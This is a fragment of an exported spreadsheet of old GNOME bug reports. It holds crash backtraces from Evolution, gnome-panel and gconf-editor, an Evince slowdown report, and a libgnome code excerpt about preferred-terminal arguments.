#0 0xffffe410 in ?? ()
No symbol table info available.
#1 0xb3abe348 in ?? ()
No symbol table info available.
#2 0xffffffff in ?? ()
No symbol table info available.
#3 0x00000001 in ?? ()
No symbol table info available.
#4 0xb6b6a954 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#5 0xb6bf8c73 in g_main_context_acquire ()
from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6 0xb6bf9cf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#7 0xb7d9240f in startup_mainloop (arg=0x0) at e-book.c:3728
loop = (GMainLoop *) 0x89477d0
#8 0xb6c12fb9 in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#9 0xb6dbcaa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#10 0xb6b73c2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1231436096 (LWP 19368)):
#0 0xffffe410 in ?? ()
No symbol table info available.
#1 0xbfffd564 in ?? ()
No symbol table info available.
#2 0x00000000 in ?? ()
No symbol table info available.
#3 0xbfffd498 in ?? ()
No symbol table info available.
#4 0xb6dc22eb in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#5 0xb78f67d8 in gnome_init_with_popt_table ()
from /opt/gnome/lib/libgnomeui-2.so.0
No symbol table info available.
#6 
No symbol table info available.
#7 0xffffe410 in ?? ()
No symbol table info available.
#8 0xbfffd85c in ?? ()
No symbol table info available.
#9 0x00000006 in ?? ()
No symbol table info available.
#10 0x00004ba8 in ?? ()
No symbol table info available.
#11 0xb6ae12c1 in raise () from /lib/tls/libc.so.6
No symbol table info available.
#12 0xb6ae2b75 in abort () from /lib/tls/libc.so.6
No symbol table info available.
#13 0xb7be49ff in mono_handle_native_sigsegv () from /usr/lib/libmono.so.0
No symbol table info available.
#14 0xb7bc3a61 in mini_method_compile () from /usr/lib/libmono.so.0
No symbol table info available.
#15 
No symbol table info available.
#16 0xb5e7accd in preview_recur (rpage=0x8b29440) at recurrence-page.c:849
priv = (RecurrencePagePrivate *) 0x0
comp = (ECalComponent *) 0x0
cdt = {value = 0xbfffe430 tzid = 0x8b20630 }
l = (GSList *) 0xb6c8f640
zone = (icaltimezone *) 0x0
#17 0xb5e7d85e in preview_date_range_changed_cb (item=0x8b2e118 
data=0x8b29440) at recurrence-page.c:2043
rpage = (RecurrencePage *) 0x8b29440
#18 0xb6c708a6 in g_cclosure_marshal_VOID__VOID ()
from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0xb6c638db in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0xb6c72d8b in g_signal_chain_from_overridden ()
from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0xb6c7413b in g_signal_emit_valist ()
from /opt/gnome/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0xb703ed25 in gtk_signal_emit () from /opt/gnome/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0xb7f9ba34 in e_calendar_item_signal_emission_idle_cb (data=0x8b2e118)
at e-calendar-item.c:3233
calitem = (ECalendarItem *) 0x8b2e118
#24 0xb6bf5051 in g_list_push_allocator ()
from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#25 0xb6bf6967 in g_main_context_dispatch ()
from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#26 0xb6bf8ce2 in g_main_context_acquire ()
from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#27 0xb6bf9cf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#28 0xb73ebcf0 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
No symbol table info available.
#29 0x0805fa43 in main (argc=2 argv=0xbfffe8e4) at main.c:611
options = {{longName = 0x8063ff1 component shortName = 99 'c' 
argInfo = 1 arg = 0x8066cd4 val = 0 
descrip = 0x8063ffc Start Evolution activating the specified component 
argDescrip = 0x0} {longName = 0x806402f offline shortName = 0 '\0' 
argInfo = 0 arg = 0x8066cc4 val = 0 
descrip = 0x8064037 Start in offline mode argDescrip = 0x0} {
longName = 0x806404d online shortName = 0 '\0' argInfo = 0 
arg = 0x8066cc0 val = 0 descrip = 0x8064054 Start in online mode 
argDescrip = 0x0} {longName = 0x8064069 force-shutdown 
shortName = 0 '\0' argInfo = 0 arg = 0x8066ccc val = 0 
descrip = 0x8064078 Forcibly shut down all Evolution components 
argDescrip = 0x0} {longName = 0x80640a4 debug shortName = 0 '\0' 
argInfo = 1 arg = 0x8066cd8 val = 0 
descrip = 0x80640ac Send the debugging output of all components to a file. argDescrip = 0x0} {longName = 0x80640e3 disable-eplugin 
shortName = 0 '\0' argInfo = 0 arg = 0x8066cd0 val = 0 
descrip = 0x80640f4 Disable loading of any plugins. argDescrip = 0x0} 
{longName = 0x8064114 setup-only shortName = 0 '\0' 
argInfo = 1073741824 arg = 0x8066cc8 val = 0 descrip = 0x0 
argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0 
arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
uri_list = (GSList *) 0x0
popt_context_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
v_pointer = 0x0}}}
program = (GnomeProgram *) 0x806dfc8
popt_context = 0x8070f08
args = (const char **) 0x0
icon_list = (GList *) 0x806d7d0
filename = 0x0
#0 0xffffe410 in ?? ()
Other information:</t>
  </si>
  <si>
    <t>pchenthill</t>
  </si>
  <si>
    <t>EVINCE-341520</t>
  </si>
  <si>
    <t>EVINCE</t>
  </si>
  <si>
    <t>Problem is you modify opened files</t>
  </si>
  <si>
    <t>Please describe the problem:
If I modify an opened file with evince 0.5.2 (here by recompiling a tex
document) I have a big laaaag. It didn't occured with previous versions then I
refreshed by ctrl+R.
Note that I use gamin.
Steps to reproduce:
1. Open a document.
2. Modify it.
3. Wait and see.
Actual results:
The application take all the ressources of the computer for 10 seconds.
Expected results:
Does this happen every time?
yes
Other information:
Add comment if you need more info.</t>
  </si>
  <si>
    <t>evince-maint</t>
  </si>
  <si>
    <t>fpoulain</t>
  </si>
  <si>
    <t>GNOME-PANEL-78372</t>
  </si>
  <si>
    <t>panel did not appear in login</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-panel
Severity: major
Version: 1.5.15
Synopsis: panel did not appear in login
Bugzilla-Product: gnome-panel
Bugzilla-Component: Panel
BugBuddy-GnomeVersion: 2.0 (1.114.0)
Description:
Description of Problem:
I had modified the panel yesterday to include a mail cpu and memory
monitor on the main panel.  When I logged in this morning there was a
message saying that I did not have any panel in my configurations do I
want to create one (with OK being the only choice).  When I hit Ok the
main top panel was recreated (without any of my applets) and there was
no bottom panel.
Additional Information:
I will play with this some more see if I can recreate the crash...
Debugging Information:
[New Thread 1024 (LWP 5009)]
0x40929ca9 in __wait4 () from /lib/i686/libc.so.6
#0  0x40929ca9 in __wait4 () from /lib/i686/libc.so.6
#1  0x409a56b4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x402d16f3 in waitpid (pid=5032 stat_loc=0xbfffe7cc options=0)
    at wrapsyscall.c:172
#3  0x401a69e1 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:593
#4  0x402cfa85 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 49168 edi = 134906288 esi = 136025088 ebp = 3221220264
esp = 3221220208 ebx = 1082143380 edx = 136025088 ecx = 2 eax =
2863311530 trapno = 14 err = 4 eip = 1082075785 cs = 35 __csh = 0
eflags = 66182 esp_at_signal = 3221220208 ss = 43 __ssh = 0 fpstate
= 0xbfffe8f0 oldmask = 2147483648 cr2 = 2863311530}) at signals.c:97
#5  
#6  g_type_check_instance_cast (type_instance=0x81b9400
iface_type=134906288)
    at gtype.c:2639
#7  0x4059064b in gtk_object_dispose (gobject=0x81b9400) at
gtkobject.c:375
#8  0x4064181c in gtk_widget_dispose (object=0x81b9400) at
gtkwidget.c:5599
#9  0x407d7f91 in g_object_run_dispose (object=0x81b9400) at
gobject.c:469
#10 0x405905de in gtk_object_destroy (object=0x81b9400) at
gtkobject.c:358
#11 0x4063a3e5 in gtk_widget_destroy (widget=0x81b9400) at
gtkwidget.c:1581
#12 0x08069a3b in set_das_pixmap (foo=0x80f9208 window=0x0)
    at foobar-widget.c:874
#13 0x407eacf6 in g_cclosure_marshal_VOID__VOID (closure=0x8149dc8 
    return_value=0x0 n_param_values=1 param_values=0xbfffefb0 
    invocation_hint=0xbfffeeb8 marshal_data=0x0) at gmarshal.c:77
#14 0x407d5fd2 in g_closure_invoke (closure=0x8149dc8 return_value=0x0
    n_param_values=1 param_values=0xbfffefb0
invocation_hint=0xbfffeeb8)
    at gclosure.c:437
#15 0x407e9f0b in signal_emit_unlocked_R (node=0x80beda8 detail=0 
    instance=0x80bfee0 emission_return=0x0
instance_and_params=0xbfffefb0)
    at gsignal.c:2341
#16 0x407e86aa in g_signal_emit_valist (instance=0x80bfee0
signal_id=18 
    detail=0 var_args=0xbffff13c) at gsignal.c:2100
#17 0x407e8927 in g_signal_emit (instance=0x80bfee0 signal_id=18
detail=0)
    at gsignal.c:2144
#18 0x401447fc in emit_active_window_changed (screen=0x80bfee0)
    at screen.c:1105
#19 0x4014460d in update_active_window (screen=0x80bfee0) at
screen.c:1012
#20 0x40144721 in do_update_now (screen=0x80bfee0) at screen.c:1065
#21 0x4014474d in update_idle (data=0x80bfee0) at screen.c:1078
#22 0x4082edb0 in g_idle_dispatch (source=0x81828c8 
    callback=0x40144734  user_data=0x80bfee0) at
gmain.c:3129
#23 0x4082c77e in g_main_dispatch (context=0x80b4040) at gmain.c:1617
#24 0x4082d595 in g_main_context_dispatch (context=0x80b4040) at
gmain.c:2161
#25 0x4082d928 in g_main_context_iterate (context=0x80b4040 block=1 
    dispatch=1 self=0x80a6750) at gmain.c:2242
#26 0x4082dfce in g_main_loop_run (loop=0x8165300) at gmain.c:2462
#27 0x40574e83 in gtk_main () at gtkmain.c:912
#28 0x0805ae71 in main (argc=3 argv=0xbffff384) at main.c:237
#29 0x4088b627 in __libc_start_main (main=0x805acc8  argc=3 
    ubp_av=0xbffff384 init=0x805702c  fini=0x80958b0  
    rtld_fini=0x4000dcc4  stack_end=0xbffff37c)
    at ../sysdeps/generic/libc-start.c:129
Thread 1 (Thread 1024 (LWP 5009)):
#0  0x40929ca9 in __wait4 () from /lib/i686/libc.so.6
#1  0x409a56b4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x402d16f3 in waitpid (pid=5032 stat_loc=0xbfffe7cc options=0)
    at wrapsyscall.c:172
#3  0x401a69e1 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:593
#4  0x402cfa85 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 49168 edi = 134906288 esi = 136025088 ebp = 3221220264
esp = 3221220208 ebx = 1082143380 edx = 136025088 ecx = 2 eax =
2863311530 trapno = 14 err = 4 eip = 1082075785 cs = 35 __csh = 0
eflags = 66182 esp_at_signal = 3221220208 ss = 43 __ssh = 0 fpstate
= 0xbfffe8f0 oldmask = 2147483648 cr2 = 2863311530}) at signals.c:97
#5  
#6  g_type_check_instance_cast (type_instance=0x81b9400
iface_type=134906288)
    at gtype.c:2639
#7  0x4059064b in gtk_object_dispose (gobject=0x81b9400) at
gtkobject.c:375
#8  0x4064181c in gtk_widget_dispose (object=0x81b9400) at
gtkwidget.c:5599
#9  0x407d7f91 in g_object_run_dispose (object=0x81b9400) at
gobject.c:469
#10 0x405905de in gtk_object_destroy (object=0x81b9400) at
gtkobject.c:358
#11 0x4063a3e5 in gtk_widget_destroy (widget=0x81b9400) at
gtkwidget.c:1581
#12 0x08069a3b in set_das_pixmap (foo=0x80f9208 window=0x0)
    at foobar-widget.c:874
#13 0x407eacf6 in g_cclosure_marshal_VOID__VOID (closure=0x8149dc8 
    return_value=0x0 n_param_values=1 param_values=0xbfffefb0 
    invocation_hint=0xbfffeeb8 marshal_data=0x0) at gmarshal.c:77
#14 0x407d5fd2 in g_closure_invoke (closure=0x8149dc8 return_value=0x0
    n_param_values=1 param_values=0xbfffefb0
invocation_hint=0xbfffeeb8)
    at gclosure.c:437
#15 0x407e9f0b in signal_emit_unlocked_R (node=0x80beda8 detail=0 
    instance=0x80bfee0 emission_return=0x0
instance_and_params=0xbfffefb0)
    at gsignal.c:2341
#16 0x407e86aa in g_signal_emit_valist (instance=0x80bfee0
signal_id=18 
    detail=0 var_args=0xbffff13c) at gsignal.c:2100
#17 0x407e8927 in g_signal_emit (instance=0x80bfee0 signal_id=18
detail=0)
    at gsignal.c:2144
#18 0x401447fc in emit_active_window_changed (screen=0x80bfee0)
    at screen.c:1105
#19 0x4014460d in update_active_window (screen=0x80bfee0) at
screen.c:1012
#20 0x40144721 in do_update_now (screen=0x80bfee0) at screen.c:1065
#21 0x4014474d in update_idle (data=0x80bfee0) at screen.c:1078
#22 0x4082edb0 in g_idle_dispatch (source=0x81828c8 
    callback=0x40144734  user_data=0x80bfee0) at
gmain.c:3129
#23 0x4082c77e in g_main_dispatch (context=0x80b4040) at gmain.c:1617
#24 0x4082d595 in g_main_context_dispatch (context=0x80b4040) at
gmain.c:2161
#25 0x4082d928 in g_main_context_iterate (context=0x80b4040 block=1 
    dispatch=1 self=0x80a6750) at gmain.c:2242
#26 0x4082dfce in g_main_loop_run (loop=0x8165300) at gmain.c:2462
#27 0x40574e83 in gtk_main () at gtkmain.c:912
#28 0x0805ae71 in main (argc=3 argv=0xbffff384) at main.c:237
#29 0x4088b627 in __libc_start_main (main=0x805acc8  argc=3 
    ubp_av=0xbffff384 init=0x805702c  fini=0x80958b0  
    rtld_fini=0x4000dcc4  stack_end=0xbffff37c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40929ca9 in __wait4 () from /lib/i686/libc.so.6
#0  0x40929ca9 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x409a56b4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x402d16f3 in waitpid (pid=5032 stat_loc=0xbfffe7cc options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffe7cc
options = 0
result = 0
oldtype = 0
#3  0x401a69e1 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:593
	in gnome-ui-init.c
estatus = 1076694286
in_segv = 1
pid = 0
#4  0x402cfa85 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 49168 edi = 134906288 esi = 136025088 ebp = 3221220264
esp = 3221220208 ebx = 1082143380 edx = 136025088 ecx = 2 eax =
2863311530 trapno = 14 err = 4 eip = 1082075785 cs = 35 __csh = 0
eflags = 66182 esp_at_signal = 3221220208 ss = 43 __ssh = 0 fpstate
= 0xbfffe8f0 oldmask = 2147483648 cr2 = 2863311530}) at signals.c:97
	in signals.c
signo = 0
__value = 0xfffffe00 
#5  
No locals.
#6  g_type_check_instance_cast (type_instance=0x81b9400
iface_type=134906288)
    at gtype.c:2639
	in gtype.c
node = (TypeNode *) 0x0
iface = (TypeNode *) 0x2
is_instantiatable = 136025088
check = 1079723321
#7  0x4059064b in gtk_object_dispose (gobject=0x81b9400) at
gtkobject.c:375
	in gtkobject.c
object = (GtkObject *) 0x81b9400
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-04-11 09:21 -------
The original reporter (bailey@jupiter.utias.utoronto.ca) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>bailey</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-336700</t>
  </si>
  <si>
    <t>[obsolete] Preferred applications</t>
  </si>
  <si>
    <t>gnome-terminal as preferred terminal breaks 'run in terminal' launchers</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #336542 +++
That's a libgnome bug: in gnome_prepend_terminal_to_vector() we do:
        terminal = gconf_client_get_string (client
/desktop/gnome/applications/terminal/exec NULL)
        if (terminal) {
                gchar *exec_flag
                exec_flag = gconf_client_get_string (client
/desktop/gnome/applications/terminal/exec_arg NULL)
                if (exec_flag == NULL) {
                        term_argc = 1
                        term_argv = g_new0 (char * 2)
                        term_argv[0] = terminal
                        term_argv[1] = NULL
                } else {
                        term_argc = 2
                        term_argv = g_new0 (char * 3)
                        term_argv[0] = terminal
                        term_argv[1] = exec_flag
                        term_argv[2] = NULL
                }
#if 0
            poptParseArgvString (terminal 
            term_argv = g_strdupv ((gchar **) temp_argv)
            g_free (terminal)
#endif
        }
It should check that terminal doesn't contain any parameter.
That's also a control-center bug since it shouldn't add any parameter to the
exec gconf key -)</t>
  </si>
  <si>
    <t>GCONF-EDITOR-334579</t>
  </si>
  <si>
    <t>GCONF-EDITOR</t>
  </si>
  <si>
    <t>gconf-editor crashed</t>
  </si>
  <si>
    <t>gconf-editor crashed for no good reason...
Backtrace was generated from '/opt/gnome/bin/gconf-editor'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1225643520 (LWP 2834)]
0xb76671fe in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#0  0xb76671fe in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0xb7f7d8a5 in libgnomeui_segv_handle (signum=-512) at gnome-ui-init.c:792
#2  
#3  0x00000000 in ?? ()
#4  0xb77a6c0b in IA__g_cclosure_marshal_VOID__OBJECT (closure=0x848a3f0 
    return_value=0x0 n_param_values=2 param_values=0xbfbc401c 
    invocation_hint=0xbfbc3f0c marshal_data=0x0) at gmarshal.c:636
#5  0xb77993b9 in IA__g_closure_invoke (closure=0x848a3f0 
    return_value=0x80cee78 n_param_values=135065208 param_values=0x80cee78 
    invocation_hint=0x80cee78) at gclosure.c:490
#6  0xb77a92ea in signal_emit_unlocked_R (node=0x809c198 detail=0 
    instance=0x80cee78 emission_return=0x0 instance_and_params=0xbfbc401c)
    at gsignal.c:2438
#7  0xb77aab70 in IA__g_signal_emit_valist (instance=0x80cee78 signal_id=32 
    detail=0 var_args=) at gsignal.c:2197
#8  0xb77aaed9 in IA__g_signal_emit (instance=0x80cee78 signal_id=135065208 
    detail=135065208) at gsignal.c:2241
#9  0xb7c0cf24 in gtk_widget_propagate_hierarchy_changed_recurse (
    widget=0x80cee78 client_data=0xbfbc4390) at gtkwidget.c:5016
#10 0xb7a4b880 in gtk_box_forall (container=0x80e78c0 include_internals=1 
    callback=0xb7c0ce90  
    callback_data=0xbfbc4390) at gtkbox.c:703
#11 0xb7a87e4c in IA__gtk_container_forall (container=0x80e78c0 
    callback=0xb7c0ce90  
    callback_data=0x80cee78) at gtkcontainer.c:1265
#12 0xb7c0cf6c in gtk_widget_propagate_hierarchy_changed_recurse (
    widget=0x80e78c0 client_data=0xbfbc4390) at gtkwidget.c:5020
#13 0xb7ad6fe3 in gtk_frame_forall (container=0x8489868 include_internals=1 
    callback=0xb7c0ce90  
    callback_data=0xbfbc4390) at gtkframe.c:303
#14 0xb7a87e4c in IA__gtk_container_forall (container=0x8489868 
    callback=0xb7c0ce90  
    callback_data=0x80cee78) at gtkcontainer.c:1265
#15 0xb7c0cf6c in gtk_widget_propagate_hierarchy_changed_recurse (
    widget=0x8489868 client_data=0xbfbc4390) at gtkwidget.c:5020
#16 0xb7c0d50c in _gtk_widget_propagate_hierarchy_changed (widget=0x8489868 
    previous_toplevel=0x80cedd8) at gtkwidget.c:5057
#17 0xb7c0d6a4 in IA__gtk_widget_unparent (widget=0x8489868)
    at gtkwidget.c:1958
#18 0xb7a47dc5 in gtk_bin_remove (container=0x80cedd8 child=0x8489868)
    at gtkbin.c:145
#19 0xb77a6c0b in IA__g_cclosure_marshal_VOID__OBJECT (closure=0x80ac4a0 
    return_value=0x0 n_param_values=2 param_values=0xbfbc470c 
    invocation_hint=0xbfbc45fc marshal_data=0xb7a47d70) at gmarshal.c:636
#20 0xb7798cf9 in g_type_class_meta_marshal (closure=0x80ac4a0 
    return_value=0x80cee78 n_param_values=135065208 param_values=0xbfbc470c 
    invocation_hint=0x80cee78 marshal_data=0x80cee78) at gclosure.c:567
#21 0xb77993b9 in IA__g_closure_invoke (closure=0x80ac4a0 
    return_value=0x80cee78 n_param_values=135065208 param_values=0x80cee78 
    invocation_hint=0x80cee78) at gclosure.c:490
#22 0xb77a95ea in signal_emit_unlocked_R (node=0x80ac4d8 detail=0 
    instance=0x80cedd8 emission_return=0x0 instance_and_params=0xbfbc470c)
    at gsignal.c:2368
#23 0xb77aab70 in IA__g_signal_emit_valist (instance=0x80cedd8 signal_id=85 
    detail=0 var_args=) at gsignal.c:2197
#24 0xb77aaed9 in IA__g_signal_emit (instance=0x80cee78 signal_id=135065208 
    detail=135065208) at gsignal.c:2241
#25 0xb7a877d7 in IA__gtk_container_remove (container=0x80cedd8 
    widget=0x8489868) at gtkcontainer.c:995
#26 0xb7c1213d in gtk_widget_dispose (object=0x8489868) at gtkwidget.c:6645
#27 0xb779cac1 in IA__g_object_run_dispose (object=0x8489868) at gobject.c:571
#28 0xb7b391ee in IA__gtk_object_destroy (object=0x8489868) at gtkobject.c:388
#29 0xb7c0a045 in IA__gtk_widget_destroy (widget=0x8489868) at gtkwidget.c:1995
#30 0xb7a47e6f in gtk_bin_forall (container=0x80cedd8 include_internals=0 
    callback=0x848a3f0 callback_data=0x80cee78) at gtkbin.c:166
#31 0xb7a87139 in IA__gtk_container_foreach (container=0x80cedd8 
    callback=0xb7c0a000  callback_data=0x80cee78)
    at gtkcontainer.c:1292
#32 0xb7a890fe in gtk_container_destroy (object=0x80cedd8)
    at gtkcontainer.c:829
#33 0xb7c208c3 in gtk_window_destroy (object=0x80cedd8) at gtkwindow.c:3828
#34 0xb77a610b in IA__g_cclosure_marshal_VOID__VOID (closure=0x806bf88 
    return_value=0x0 n_param_values=1 param_values=0xbfbc4d2c 
    invocation_hint=0xbfbc4c1c marshal_data=0xb7c20840) at gmarshal.c:77
#35 0xb7798cf9 in g_type_class_meta_marshal (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0xbfbc4d2c 
    invocation_hint=0x80cee78 marshal_data=0x80cee78) at gclosure.c:567
#36 0xb77993b9 in IA__g_closure_invoke (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0x80cee78 
    invocation_hint=0x80cee78) at gclosure.c:490
#37 0xb77a9b3e in signal_emit_unlocked_R (node=0x806bfd0 detail=0 
    instance=0x80cedd8 emission_return=0x0 instance_and_params=0xbfbc4d2c)
    at gsignal.c:2554
#38 0xb77aab70 in IA__g_signal_emit_valist (instance=0x80cedd8 signal_id=2 
    detail=0 var_args=) at gsignal.c:2197
#39 0xb77aaed9 in IA__g_signal_emit (instance=0x80cee78 signal_id=135065208 
    detail=135065208) at gsignal.c:2241
#40 0xb7b3923f in gtk_object_dispose (gobject=0x80cedd8) at gtkobject.c:403
#41 0xb7c12163 in gtk_widget_dispose (object=0x80cedd8) at gtkwidget.c:6653
#42 0xb7c19592 in gtk_window_dispose (object=0x80cedd8) at gtkwindow.c:1762
#43 0xb779cac1 in IA__g_object_run_dispose (object=0x80cedd8) at gobject.c:571
#44 0xb7b391ee in IA__gtk_object_destroy (object=0x80cedd8) at gtkobject.c:388
#45 0xb7c0a045 in IA__gtk_widget_destroy (widget=0x80cedd8) at gtkwidget.c:1995
#46 0xb7bf99f5 in gtk_tree_view_destroy (object=0x80d2f50)
    at gtktreeview.c:1434
#47 0xb77a610b in IA__g_cclosure_marshal_VOID__VOID (closure=0x806bf88 
    return_value=0x0 n_param_values=1 param_values=0xbfbc52ec 
    invocation_hint=0xbfbc51dc marshal_data=0xb7bf9850) at gmarshal.c:77
#48 0xb7798cf9 in g_type_class_meta_marshal (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0xbfbc52ec 
    invocation_hint=0x80cee78 marshal_data=0x80cee78) at gclosure.c:567
#49 0xb77993b9 in IA__g_closure_invoke (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0x80cee78 
    invocation_hint=0x80cee78) at gclosure.c:490
#50 0xb77a9b3e in signal_emit_unlocked_R (node=0x806bfd0 detail=0 
    instance=0x80d2f50 emission_return=0x0 instance_and_params=0xbfbc52ec)
    at gsignal.c:2554
#51 0xb77aab70 in IA__g_signal_emit_valist (instance=0x80d2f50 signal_id=2 
    detail=0 var_args=) at gsignal.c:2197
#52 0xb77aaed9 in IA__g_signal_emit (instance=0x80cee78 signal_id=135065208 
    detail=135065208) at gsignal.c:2241
#53 0xb7b3923f in gtk_object_dispose (gobject=0x80d2f50) at gtkobject.c:403
#54 0xb7c12163 in gtk_widget_dispose (object=0x80d2f50) at gtkwidget.c:6653
#55 0xb779cac1 in IA__g_object_run_dispose (object=0x80d2f50) at gobject.c:571
#56 0xb7b391ee in IA__gtk_object_destroy (object=0x80d2f50) at gtkobject.c:388
#57 0xb7c0a045 in IA__gtk_widget_destroy (widget=0x80d2f50) at gtkwidget.c:1995
#58 0xb7a47e6f in gtk_bin_forall (container=0x80969d0 include_internals=0 
    callback=0x848a3f0 callback_data=0x80cee78) at gtkbin.c:166
#59 0xb7b5c9ac in gtk_scrolled_window_forall (container=0x80969d0 
    include_internals=0 callback=0xb7c0a000  
    callback_data=0x0) at gtkscrolledwindow.c:816
#60 0xb7a87139 in IA__gtk_container_foreach (container=0x80969d0 
    callback=0xb7c0a000  callback_data=0x80cee78)
    at gtkcontainer.c:1292
#61 0xb7a890fe in gtk_container_destroy (object=0x80969d0)
    at gtkcontainer.c:829
#62 0xb7b5c611 in gtk_scrolled_window_destroy (object=0x80969d0)
    at gtkscrolledwindow.c:675
#63 0xb77a610b in IA__g_cclosure_marshal_VOID__VOID (closure=0x806bf88 
    return_value=0x0 n_param_values=1 param_values=0xbfbc592c 
    invocation_hint=0xbfbc581c marshal_data=0xb7b5c5a0) at gmarshal.c:77
#64 0xb7798cf9 in g_type_class_meta_marshal (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0xbfbc592c 
    invocation_hint=0x80cee78 marshal_data=0x80cee78) at gclosure.c:567
#65 0xb77993b9 in IA__g_closure_invoke (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0x80cee78 
    invocation_hint=0x80cee78) at gclosure.c:490
#66 0xb77a9b3e in signal_emit_unlocked_R (node=0x806bfd0 detail=0 
    instance=0x80969d0 emission_return=0x0 instance_and_params=0xbfbc592c)
    at gsignal.c:2554
#67 0xb77aab70 in IA__g_signal_emit_valist (instance=0x80969d0 signal_id=2 
    detail=0 var_args=) at gsignal.c:2197
#68 0xb77aaed9 in IA__g_signal_emit (instance=0x80cee78 signal_id=135065208 
    detail=135065208) at gsignal.c:2241
#69 0xb7b3923f in gtk_object_dispose (gobject=0x80969d0) at gtkobject.c:403
#70 0xb7c12163 in gtk_widget_dispose (object=0x80969d0) at gtkwidget.c:6653
#71 0xb779cac1 in IA__g_object_run_dispose (object=0x80969d0) at gobject.c:571
#72 0xb7b391ee in IA__gtk_object_destroy (object=0x80969d0) at gtkobject.c:388
#73 0xb7c0a045 in IA__gtk_widget_destroy (widget=0x80969d0) at gtkwidget.c:1995
#74 0xb7b3eab7 in gtk_paned_forall (container=0x80e4120 include_internals=0 
    callback=0xb7c0a000  callback_data=0x0)
    at gtkpaned.c:1096
#75 0xb7a87139 in IA__gtk_container_foreach (container=0x80e4120 
    callback=0xb7c0a000  callback_data=0x80cee78)
    at gtkcontainer.c:1292
#76 0xb7a890fe in gtk_container_destroy (object=0x80e4120)
    at gtkcontainer.c:829
#77 0xb77a610b in IA__g_cclosure_marshal_VOID__VOID (closure=0x806bf88 
    return_value=0x0 n_param_values=1 param_values=0xbfbc5f1c 
    invocation_hint=0xbfbc5e0c marshal_data=0xb7a890c0) at gmarshal.c:77
#78 0xb7798cf9 in g_type_class_meta_marshal (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0xbfbc5f1c 
    invocation_hint=0x80cee78 marshal_data=0x80cee78) at gclosure.c:567
#79 0xb77993b9 in IA__g_closure_invoke (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0x80cee78 
    invocation_hint=0x80cee78) at gclosure.c:490
#80 0xb77a9b3e in signal_emit_unlocked_R (node=0x806bfd0 detail=0 
    instance=0x80e4120 emission_return=0x0 instance_and_params=0xbfbc5f1c)
    at gsignal.c:2554
#81 0xb77aab70 in IA__g_signal_emit_valist (instance=0x80e4120 signal_id=2 
    detail=0 var_args=) at gsignal.c:2197
#82 0xb77aaed9 in IA__g_signal_emit (instance=0x80cee78 signal_id=135065208 
    detail=135065208) at gsignal.c:2241
#83 0xb7b3923f in gtk_object_dispose (gobject=0x80e4120) at gtkobject.c:403
#84 0xb7c12163 in gtk_widget_dispose (object=0x80e4120) at gtkwidget.c:6653
#85 0xb779cac1 in IA__g_object_run_dispose (object=0x80e4120) at gobject.c:571
#86 0xb7b391ee in IA__gtk_object_destroy (object=0x80e4120) at gtkobject.c:388
